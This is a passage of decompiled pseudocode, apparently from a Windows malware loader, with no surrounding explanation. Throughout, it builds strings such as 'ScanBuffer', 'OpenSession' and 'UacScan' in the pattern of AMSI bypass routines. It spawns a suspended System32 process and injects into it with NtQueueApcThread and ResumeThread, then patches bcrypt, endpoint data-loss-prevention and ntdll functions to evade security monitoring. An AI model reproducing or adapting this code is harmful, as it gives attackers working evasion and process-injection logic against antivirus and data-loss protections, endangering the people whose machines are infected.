                    					E03264698( &_v1600, E03264964(_v1604));
                    					_pop(_t6163);
                    					E03277C04(_v1600,  *0x33928a8, _t6163, _t7122);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v1608, E03264964(_v1612));
                    					_push(_v1608);
                    					E032647B0( &_v1620,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1616, E03264964(_v1620));
                    					_pop(_t6168);
                    					E03277C04(_v1616,  *0x33928a8, _t6168, _t7122);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v1624, E03264964(_v1628));
                    					_push(_v1624);
                    					E032647B0( &_v1636,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1632, E03264964(_v1636));
                    					_pop(_t6173);
                    					E03277C04(_v1632,  *0x33928a8, _t6173, _t7122);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v1640, E03264964(_v1644));
                    					_push(_v1640);
                    					E032647B0( &_v1652,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v1648, E03264964(_v1652));
                    					_pop(_t6178);
                    					E03277C04(_v1648,  *0x33928a8, _t6178, _t7122);
                    					E032648B0( *0x33928b8, 0x3286d40);
                    					if(_t7122 != 0) {
                    						L28:
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v2204, E03264964(_v2208));
                    						_push(_v2204);
                    						E032647B0( &_v2216,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2212, E03264964(_v2216));
                    						_pop(_t6184);
                    						E03277C04(_v2212,  *0x33928a8, _t6184, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v2220, E03264964(_v2224));
                    						_push(_v2220);
                    						E032647B0( &_v2232,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2228, E03264964(_v2232));
                    						_pop(_t6189);
                    						E03277C04(_v2228,  *0x33928a8, _t6189, __eflags);
                    						E0327CE98( *0x339286c, _t5539,  &_v2236,  *0x33928d4, _t7104, _t7105);
                    						E032644F4(0x339281c, _v2236);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v2240, E03264964(_v2244));
                    						_push(_v2240);
                    						E032647B0( &_v2252,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2248, E03264964(_v2252));
                    						_pop(_t6196);
                    						E03277C04(_v2248,  *0x33928a8, _t6196, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v2256, E03264964(_v2260));
                    						_push(_v2256);
                    						E032647B0( &_v2268,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2264, E03264964(_v2268));
                    						_pop(_t6201);
                    						E03277C04(_v2264,  *0x33928a8, _t6201, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v2272, E03264964(_v2276));
                    						_push(_v2272);
                    						E032647B0( &_v2284,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2280, E03264964(_v2284));
                    						_pop(_t6206);
                    						E03277C04(_v2280,  *0x33928a8, _t6206, __eflags);
                    						E0327D550( *0x339281c, _t5539,  &_v2288, E03267AB0( *0x33928c4, __eflags), _t7105);
                    						E032644F4(0x3392818, _v2288);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v2292, E03264964(_v2296));
                    						_push(_v2292);
                    						E032647B0( &_v2304,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2300, E03264964(_v2304));
                    						_pop(_t6213);
                    						E03277C04(_v2300,  *0x33928a8, _t6213, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v2308, E03264964(_v2312));
                    						_push(_v2308);
                    						E032647B0( &_v2320,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2316, E03264964(_v2320));
                    						_pop(_t6218);
                    						E03277C04(_v2316,  *0x33928a8, _t6218, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v2324, E03264964(_v2328));
                    						_push(_v2324);
                    						E032647B0( &_v2336,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2332, E03264964(_v2336));
                    						_pop(_t6223);
                    						E03277C04(_v2332,  *0x33928a8, _t6223, __eflags);
                    						E03277CB0( *0x3392818,  *0x33928a8,  &_v2344);
                    						E0327D4EC(_v2344,  *0x33928a8,  &_v2340);
                    						E032644F4(0x3392870, _v2340);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v2348, E03264964(_v2352));
                    						_push(_v2348);
                    						E032647B0( &_v2360,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2356, E03264964(_v2360));
                    						_pop(_t6231);
                    						E03277C04(_v2356,  *0x33928a8, _t6231, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v2364, E03264964(_v2368));
                    						_push(_v2364);
                    						E032647B0( &_v2376,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2372, E03264964(_v2376));
                    						_pop(_t6236);
                    						E03277C04(_v2372,  *0x33928a8, _t6236, __eflags);
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanString");
                    						E03264824();
                    						E03264698( &_v2380, E03264964(_v2384));
                    						_push(_v2380);
                    						E032647B0( &_v2392,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v2388, E03264964(_v2392));
                    						_pop(_t6241);
                    						E03277C04(_v2388,  *0x33928a8, _t6241, __eflags);
                    						E032648B0( *0x33928d0, 0x3286d40);
                    						if(__eflags != 0) {
                    							L32:
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v3476, E03264964(_v3480));
                    							_push(_v3476);
                    							E032647B0( &_v3488,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v3484, E03264964(_v3488));
                    							_pop(_t6247);
                    							E03277C04(_v3484,  *0x33928a8, _t6247, __eflags);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v3492, E03264964(_v3496));
                    							_push(_v3492);
                    							E032647B0( &_v3504,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v3500, E03264964(_v3504));
                    							_pop(_t6252);
                    							E03277C04(_v3500,  *0x33928a8, _t6252, __eflags);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v3508, E03264964(_v3512));
                    							_push(_v3508);
                    							E032647B0( &_v3520,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v3516, E03264964(_v3520));
                    							_pop(_t6257);
                    							E03277C04(_v3516,  *0x33928a8, _t6257, __eflags);
                    							E032648B0( *0x33928c0, 0x3286d40);
                    							if(__eflags != 0) {
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v3820, E03264964(_v3824));
                    								_push(_v3820);
                    								E032647B0( &_v3832,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3828, E03264964(_v3832));
                    								_pop(_t6263);
                    								E03277C04(_v3828,  *0x33928a8, _t6263, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v3836, E03264964(_v3840));
                    								_push(_v3836);
                    								E032647B0( &_v3848,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3844, E03264964(_v3848));
                    								_pop(_t6268);
                    								E03277C04(_v3844,  *0x33928a8, _t6268, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3852, E03264964(_v3856));
                    								_push(_v3852);
                    								E032647B0( &_v3864,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3860, E03264964(_v3864));
                    								_pop(_t6273);
                    								E03277C04(_v3860,  *0x33928a8, _t6273, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v3868, E03264964(_v3872));
                    								_push(_v3868);
                    								E032647B0( &_v3880,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3876, E03264964(_v3880));
                    								_pop(_t6278);
                    								E03277C04(_v3876,  *0x33928a8, _t6278, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3884, E03264964(_v3888));
                    								_push(_v3884);
                    								E032647B0( &_v3896,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3892, E03264964(_v3896));
                    								_pop(_t6283);
                    								E03277C04(_v3892,  *0x33928a8, _t6283, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v3900, E03264964(_v3904));
                    								_push(_v3900);
                    								E032647B0( &_v3912,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3908, E03264964(_v3912));
                    								_pop(_t6288);
                    								E03277C04(_v3908,  *0x33928a8, _t6288, __eflags);
                    								E032648B0( *0x33928bc, 0x3286d40);
                    								if(__eflags == 0) {
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("UacScan");
                    									E03264824();
                    									E03264698( &_v3916, E03264964(_v3920));
                    									_push(_v3916);
                    									E032647B0( &_v3928,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v3924, E03264964(_v3928));
                    									_pop(_t6538);
                    									E03277C04(_v3924,  *0x33928a8, _t6538, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v3932, E03264964(_v3936));
                    									_push(_v3932);
                    									E032647B0( &_v3944,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v3940, E03264964(_v3944));
                    									_pop(_t6543);
                    									E03277C04(_v3940,  *0x33928a8, _t6543, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanString");
                    									E03264824();
                    									E03264698( &_v3948, E03264964(_v3952));
                    									_push(_v3948);
                    									E032647B0( &_v3960,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v3956, E03264964(_v3960));
                    									_pop(_t6548);
                    									E03277C04(_v3956,  *0x33928a8, _t6548, __eflags);
                    									E032647B0( &_v3968,  *0x3392820, "C:\\Windows\\System32\\");
                    									E03264D38( &_v3964, E03264964(_v3968));
                    									_t3979 = CreateProcessAsUserW( *0x3392794, 0, E03264DB4(_v3964), 0, 0, 0, 4, 0, 0, 0x3392798, 0x33927dc);
                    									__eflags = _t3979;
                    									if(_t3979 != 0) {
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("OpenSession");
                    										E03264824();
                    										E03264698( &_v3972, E03264964(_v3976));
                    										_push(_v3972);
                    										E032647B0( &_v3984,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v3980, E03264964(_v3984));
                    										_pop(_t6620);
                    										E03277C04(_v3980,  *0x33928a8, _t6620, __eflags);
                    									}
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v3988, E03264964(_v3992));
                    									_push(_v3988);
                    									E032647B0( &_v4000,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v3996, E03264964(_v4000));
                    									_pop(_t6555);
                    									E03277C04(_v3996,  *0x33928a8, _t6555, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("UacScan");
                    									E03264824();
                    									E03264698( &_v4004, E03264964(_v4008));
                    									_push(_v4004);
                    									E032647B0( &_v4016,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4012, E03264964(_v4016));
                    									_pop(_t6560);
                    									E03277C04(_v4012,  *0x33928a8, _t6560, __eflags);
                    									_v1112 =  *0x3392870;
                    									_t5539 = _v1112;
                    									__eflags = _t5539;
                    									if(_t5539 != 0) {
                    										_t5540 = _t5539 - 4;
                    										__eflags = _t5540;
                    										_t5539 =  *_t5540;
                    									}
                    									E0327CCC8(0x329e54c, _t5539, E032649BC(0x3392870));
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v4020, E03264964(_v4024));
                    									_push(_v4020);
                    									E032647B0( &_v4032,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4028, E03264964(_v4032));
                    									_pop(_t6566);
                    									E03277C04(_v4028,  *0x33928a8, _t6566, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v4036, E03264964(_v4040));
                    									_push(_v4036);
                    									E032647B0( &_v4048,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4044, E03264964(_v4048));
                    									_pop(_t6571);
                    									E03277C04(_v4044,  *0x33928a8, _t6571, __eflags);
                    									 *0x3392868 = E0327C24C(0x33927dc->hProcess, _t5539, 0x329e54c, _t7104, _t7105);
                    									__eflags =  *0x3392868;
                    									if( *0x3392868 != 0) {
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("OpenSession");
                    										E03264824();
                    										E03264698( &_v4052, E03264964(_v4056));
                    										_push(_v4052);
                    										E032647B0( &_v4064,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v4060, E03264964(_v4064));
                    										_pop(_t6615);
                    										E03277C04(_v4060,  *0x33928a8, _t6615, __eflags);
                    									}
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("Initialize");
                    									E03264824();
                    									E03264698( &_v4068, E03264964(_v4072));
                    									_push(_v4068);
                    									E032647B0( &_v4080,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4076, E03264964(_v4080));
                    									_pop(_t6577);
                    									E03277C04(_v4076,  *0x33928a8, _t6577, __eflags);
                    									NtQueueApcThread( *0x33927e0,  *0x3392868, 0, 0, 0);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("UacScan");
                    									E03264824();
                    									E03264698( &_v4084, E03264964(_v4088));
                    									_push(_v4084);
                    									E032647B0( &_v4096,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4092, E03264964(_v4096));
                    									_pop(_t6582);
                    									E03277C04(_v4092,  *0x33928a8, _t6582, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("Initialize");
                    									E03264824();
                    									E03264698( &_v4100, E03264964(_v4104));
                    									_push(_v4100);
                    									E032647B0( &_v4112,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4108, E03264964(_v4112));
                    									_pop(_t6587);
                    									E03277C04(_v4108,  *0x33928a8, _t6587, __eflags);
                    									ResumeThread( *0x33927e0);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("UacScan");
                    									E03264824();
                    									E03264698( &_v4116, E03264964(_v4120));
                    									_push(_v4116);
                    									E032647B0( &_v4128,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4124, E03264964(_v4128));
                    									_pop(_t6592);
                    									E03277C04(_v4124,  *0x33928a8, _t6592, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v4132, E03264964(_v4136));
                    									_push(_v4132);
                    									E032647B0( &_v4144,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4140, E03264964(_v4144));
                    									_pop(_t6597);
                    									E03277C04(_v4140,  *0x33928a8, _t6597, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v4148, E03264964(_v4152));
                    									_push(_v4148);
                    									E032647B0( &_v4160,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4156, E03264964(_v4160));
                    									_pop(_t6602);
                    									E03277C04(_v4156,  *0x33928a8, _t6602, __eflags);
                    									E03277B14(0x33927dc->hProcess, "BCryptVerifySignature");
                    									E03277B14(0x33927dc->hProcess, "BCryptQueryProviderRegistration");
                    									E03277B14(0x33927dc->hProcess, "BCryptRegisterProvider");
                    									E03277B14(0x33927dc->hProcess, "NtReadVirtualMemory");
                    									E03277B14(0x33927dc->hProcess, "NtOpenObjectAuditAlarm");
                    									E03277B14(0x33927dc->hProcess, "I_QueryTagInformation");
                    									E03277B14(0x33927dc->hProcess, "NtSetSecurityObject");
                    									E03277B14(0x33927dc->hProcess, "NtOpenProcess");
                    									CloseHandle( *0x33927dc);
                    								}
                    								E032648B0( *0x339282c, 0x3286d40);
                    								if(__eflags == 0) {
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v4164, E03264964(_v4168));
                    									_push(_v4164);
                    									E032647B0( &_v4176,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4172, E03264964(_v4176));
                    									_pop(_t6468);
                    									E03277C04(_v4172,  *0x33928a8, _t6468, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanString");
                    									E03264824();
                    									E03264698( &_v4180, E03264964(_v4184));
                    									_push(_v4180);
                    									E032647B0( &_v4192,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4188, E03264964(_v4192));
                    									_pop(_t6473);
                    									E03277C04(_v4188,  *0x33928a8, _t6473, __eflags);
                    									_push( *0x339287c);
                    									_push(0x3286d78);
                    									E03277CB0( *0x33928cc,  *0x33928a8,  &_v4200);
                    									_push(_v4200);
                    									_push(0x3287054);
                    									_push(0);
                    									_push(0x3287060);
                    									_push(0);
                    									_push(0x328706c);
                    									E03264824();
                    									E03264698(0x33928b4, E03264964(_v4196));
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanString");
                    									E03264824();
                    									E03264698( &_v4204, E03264964(_v4208));
                    									_push(_v4204);
                    									E032647B0( &_v4216,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4212, E03264964(_v4216));
                    									_pop(_t6481);
                    									E03277C04(_v4212,  *0x33928a8, _t6481, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v4220, E03264964(_v4224));
                    									_push(_v4220);
                    									E032647B0( &_v4232,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4228, E03264964(_v4232));
                    									_pop(_t6486);
                    									E03277C04(_v4228,  *0x33928a8, _t6486, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v4236, E03264964(_v4240));
                    									_push(_v4236);
                    									E032647B0( &_v4248,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4244, E03264964(_v4248));
                    									_pop(_t6491);
                    									E03277C04(_v4244,  *0x33928a8, _t6491, __eflags);
                    									_t3812 = E03267E40( *0x33928b4);
                    									__eflags = _t3812;
                    									if(_t3812 == 0) {
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("UacScan");
                    										E03264824();
                    										E03264698( &_v4252, E03264964(_v4256));
                    										_push(_v4252);
                    										E032647B0( &_v4264,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v4260, E03264964(_v4264));
                    										_pop(_t6512);
                    										E03277C04(_v4260,  *0x33928a8, _t6512, __eflags);
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("ScanBuffer");
                    										E03264824();
                    										E03264698( &_v4268, E03264964(_v4272));
                    										_push(_v4268);
                    										E032647B0( &_v4280,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v4276, E03264964(_v4280));
                    										_pop(_t6517);
                    										E03277C04(_v4276,  *0x33928a8, _t6517, __eflags);
                    										E0327CE58(0x3289d58,  &_v4284, 0x109ff);
                    										E032644F4(0x3392844, _v4284);
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("UacScan");
                    										E03264824();
                    										E03264698( &_v4288, E03264964(_v4292));
                    										_push(_v4288);
                    										E032647B0( &_v4300,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v4296, E03264964(_v4300));
                    										_pop(_t6524);
                    										E03277C04(_v4296,  *0x33928a8, _t6524, __eflags);
                    										_push(0x3286aa0);
                    										_push( *0x33928a8);
                    										_push("ScanString");
                    										E03264824();
                    										E03264698( &_v4304, E03264964(_v4308));
                    										_push(_v4304);
                    										E032647B0( &_v4316,  *0x33928a8, 0x3286aa0);
                    										E03264698( &_v4312, E03264964(_v4316));
                    										_pop(_t6529);
                    										E03277C04(_v4312,  *0x33928a8, _t6529, __eflags);
                    										E03264DA4( &_v4320,  *0x33928b4);
                    										_push(_v4320);
                    										E03264DA4( &_v4328,  *0x3392844);
                    										E03264728( &_v4324, _v4328);
                    										_pop(_t6533);
                    										E0327CB04(_v4324, _t5539, _t6533, _t7105);
                    									}
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("Initialize");
                    									E03264824();
                    									E03264698( &_v4332, E03264964(_v4336));
                    									_push(_v4332);
                    									E032647B0( &_v4344,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4340, E03264964(_v4344));
                    									_pop(_t6496);
                    									E03277C04(_v4340,  *0x33928a8, _t6496, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v4348, E03264964(_v4352));
                    									_push(_v4348);
                    									E032647B0( &_v4360,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4356, E03264964(_v4360));
                    									_pop(_t6501);
                    									E03277C04(_v4356,  *0x33928a8, _t6501, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v4364, E03264964(_v4368));
                    									_push(_v4364);
                    									E032647B0( &_v4376,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v4372, E03264964(_v4376));
                    									_pop(_t6506);
                    									E03277C04(_v4372,  *0x33928a8, _t6506, __eflags);
                    									E03277F54( *0x33928b4, _t5539, E032649BC(0x3392870), _t7104, _t7105, _t7125);
                    								}
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v4380, E03264964(_v4384));
                    								_push(_v4380);
                    								E032647B0( &_v4392,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4388, E03264964(_v4392));
                    								_pop(_t6295);
                    								E03277C04(_v4388,  *0x33928a8, _t6295, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v4396, E03264964(_v4400));
                    								_push(_v4396);
                    								E032647B0( &_v4408,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4404, E03264964(_v4408));
                    								_pop(_t6300);
                    								E03277C04(_v4404,  *0x33928a8, _t6300, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v4412, E03264964(_v4416));
                    								_push(_v4412);
                    								E032647B0( &_v4424,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4420, E03264964(_v4424));
                    								_pop(_t6305);
                    								E03277C04(_v4420,  *0x33928a8, _t6305, __eflags);
                    								E03264698( &_v4428, "BCryptVerifySignature");
                    								_push(_v4428);
                    								E03264698( &_v4432, "bcrypt");
                    								_pop(_t6308);
                    								E03277C04(_v4432,  *0x33928a8, _t6308, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v4436, E03264964(_v4440));
                    								_push(_v4436);
                    								E032647B0( &_v4448,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4444, E03264964(_v4448));
                    								_pop(_t6313);
                    								E03277C04(_v4444,  *0x33928a8, _t6313, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v4452, E03264964(_v4456));
                    								_push(_v4452);
                    								E032647B0( &_v4464,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4460, E03264964(_v4464));
                    								_pop(_t6318);
                    								E03277C04(_v4460,  *0x33928a8, _t6318, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v4468, E03264964(_v4472));
                    								_push(_v4468);
                    								_t5632 =  *0x33928a8;
                    								E032647B0( &_v4480,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4476, E03264964(_v4480));
                    								_pop(_t6323);
                    								E03277C04(_v4476,  *0x33928a8, _t6323, __eflags);
                    								E03264698( &_v4484, "DlpNotifyPreDragDrop");
                    								_push(_v4484);
                    								E03264698( &_v4488, "endpointdlp");
                    								_pop(_t6326);
                    								E03277C04(_v4488,  *0x33928a8, _t6326, __eflags);
                    								E03264698( &_v4492, "DlpCheckIsCloudSyncApp");
                    								_push(_v4492);
                    								E03264698( &_v4496, "endpointdlp");
                    								_pop(_t6329);
                    								E03277C04(_v4496,  *0x33928a8, _t6329, __eflags);
                    								E03264698( &_v4500, "DlpGetArchiveFileTraceInfo");
                    								_push(_v4500);
                    								E03264698( &_v4504, "endpointdlp");
                    								_pop(_t6332);
                    								E03277C04(_v4504,  *0x33928a8, _t6332, __eflags);
                    								E03264698( &_v4508, "DlpGetWebSiteAccess");
                    								_push(_v4508);
                    								E03264698( &_v4512, "endpointdlp");
                    								_pop(_t6335);
                    								E03277C04(_v4512, _t5632, _t6335, __eflags);
                    								E03264698( &_v4516, "NtAlertResumeThread");
                    								_push(_v4516);
                    								E03264698( &_v4520, "ntdll");
                    								_pop(_t6338);
                    								E03277C04(_v4520, _t5632, _t6338, __eflags);
                    								E03264698( &_v4524, "RtlAllocateHeap");
                    								_push(_v4524);
                    								E03264698( &_v4528, "ntdll");
                    								_pop(_t6341);
                    								E03277C04(_v4528, _t5632, _t6341, __eflags);
                    								E03264698( &_v4532, "NtWaitForSingleObject");
                    								_push(_v4532);
                    								E03264698( &_v4536, "ntdll");
                    								_pop(_t6344);
                    								E03277C04(_v4536, _t5632, _t6344, __eflags);
                    								E03264698( &_v4540, "RtlAllocateHeap");
                    								_push(_v4540);
                    								E03264698( &_v4544, "ntdll");
                    								_pop(_t6347);
                    								E03277C04(_v4544, _t5632, _t6347, __eflags);
                    								E03264698( &_v4548, "RtlCreateQueryDebugBuffer");
                    								_push(_v4548);
                    								E03264698( &_v4552, "ntdll");
                    								_pop(_t6350);
                    								E03277C04(_v4552, _t5632, _t6350, __eflags);
                    								E03277C04(0x3287160, _t5632, "NtQuerySystemInformation", __eflags);
                    								E03277C04(0x3287160, _t5632, "NtDeviceIoControlFile", __eflags);
                    								E03277C04(0x3287160, _t5632, "NtQueryDirectoryFile", __eflags);
                    								E03277C04(0x3287160, _t5632, "RtlQueryProcessDebugInformation", __eflags);
                    								E03277C04("Advapi", _t5632, "EnumServicesStatusA", __eflags);
                    								E03277C04("Advapi", _t5632, "EnumServicesStatusW", __eflags);
                    								E03277C04("Advapi", _t5632, "EnumServicesStatusExA", __eflags);
                    								E03277C04("Advapi", _t5632, "EnumServicesStatusExW", __eflags);
                    								E03277C04(0x328727c, _t5632, "EnumProcessModules", __eflags);
                    								E03277C04("Kernel32", _t5632, "CreateProcessA", __eflags);
                    								E03277C04("Kernel32", _t5632, "CreateProcessW", __eflags);
                    								E03277C04("Advapi", _t5632, "CreateProcessAsUserA", __eflags);
                    								E03277C04("Advapi", _t5632, "CreateProcessAsUserW", __eflags);
                    								E03277C04("Advapi", _t5632, "CreateProcessWithLogonW", __eflags);
                    								E03277C04("ws2_32", _t5632, "connect", __eflags);
                    								E03277C04("Kernel32", _t5632, "CreateProcessAsUserW", __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v4556, E03264964(_v4560));
                    								_push(_v4556);
                    								E032647B0( &_v4568,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4564, E03264964(_v4568));
                    								_pop(_t6371);
                    								E03277C04(_v4564,  *0x33928a8, _t6371, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v4572, E03264964(_v4576));
                    								_push(_v4572);
                    								E032647B0( &_v4584,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4580, E03264964(_v4584));
                    								_pop(_t6376);
                    								E03277C04(_v4580,  *0x33928a8, _t6376, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v4588, E03264964(_v4592));
                    								_push(_v4588);
                    								_t5635 =  *0x33928a8;
                    								E032647B0( &_v4600,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4596, E03264964(_v4600));
                    								_pop(_t6381);
